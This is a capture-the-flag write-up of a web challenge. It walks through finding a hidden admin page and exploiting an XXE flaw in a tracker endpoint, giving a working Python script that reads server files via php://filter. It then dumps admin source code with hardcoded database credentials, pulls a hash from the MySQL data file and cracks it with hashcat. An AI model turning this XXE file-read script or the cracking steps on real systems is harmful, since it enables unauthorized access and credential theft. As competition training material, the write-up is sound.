Starting at the URL, we can see a page serving a static image /troll.jpg
. No special parameter can be found. The image is confirm to be static. Some stegano test were done on the image but nothing special is observe.
Hidden admin page
We scan the host for hidden files and directories using tachyon. The tool found the existence of /admin.php
The login page does a HTTP request behind the scene.
GET /tracker.php?ip=%3Cip%3E24.37.129.50%3C/ip%3E HTTP/1.1
We test the parameter ip
for XXE. (Script genrated using Reissue Request Scripter)
import requests
from requests.auth import HTTPBasicAuth
from base64 import b64decode
import sys
session = requests.Session()
file = sys.argv[1]
xml = """
<!DOCTYPE trk [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=""" +file+ """">
paramsGet = {"ip":xml}
headers = {"Accept-Language":"en-US,en;q=0.5","X-Requested-With":"XMLHttpRequest","Accept-Encoding":"gzip, deflate","Referer":"","Accept":"*/*","Connection":"keep-alive"}
cookies = {"PHPSESSID":"mtlrcjeho92fnfbq32larj2cr7"}
response = session.get("", params=paramsGet, headers=headers, cookies=cookies, auth=HTTPBasicAuth("web300","1265EsDy72cY7yr"))
#print "Status code:", response.status_code
print b64decode(response.text)
We can than fetch the source code of /var/www/admin.php
using the previous script.
$_POST = (object)$_POST;
$_POST->error = false;
$result = "";
if($_POST->username && $_POST->password) {
$link = mysql_connect('localhost', 'root', 'z0JM45x6FvI1Slj');
mysql_select_db('users', $link);
$query = 'SELECT username, password FROM user WHERE username = ' . sanitize($_POST->username);
$_SESSION['result'] = mysql_query($query);
if(mysql_num_rows($_SESSION['result']) != 0) {
while(($row = mysql_fetch_assoc($_SESSION['result']))) {
if($row['password'] == md5($_POST->password . 'Tr0ll1ngS4lT!3l337')) {
$_SESSION['LOGGED_IN'] = true;
} else {
$_POST->error = true;
} else {
$_POST->error = true;
function sanitize($buffer) {
return "'" . addslashes(str_replace("'", '', $buffer)) . "'";
<!DOCTYPE html>
Suprisingly, the MySql cache is readable by the user www-data
. From it, we can extract the hash of the admin user.
$ python "/var/lib/mysql/ibdata1" > mysql_cache_dump
$ strings mysql_cache_dump
The hash 9e1b6b6f4377b35c175465946bf61dae
is the result of md5(PASSWORD+'Tr0ll1ngS4lT!3l337')
. On hashcat it refer to the hash type: 10.
$ cudaHashcat64.exe -m 10 -a 3 -o outfile.txt crackme.txt
If we concatenate the admin password to the flag prefix found in the source code, the final flag is : FLAG-7S131l13M7v9K5Yv86ob4ddrug
Credits: l33tb33s Team (madmantm, h3xstream, 0xquad, ldionmarcil, mcw, tito)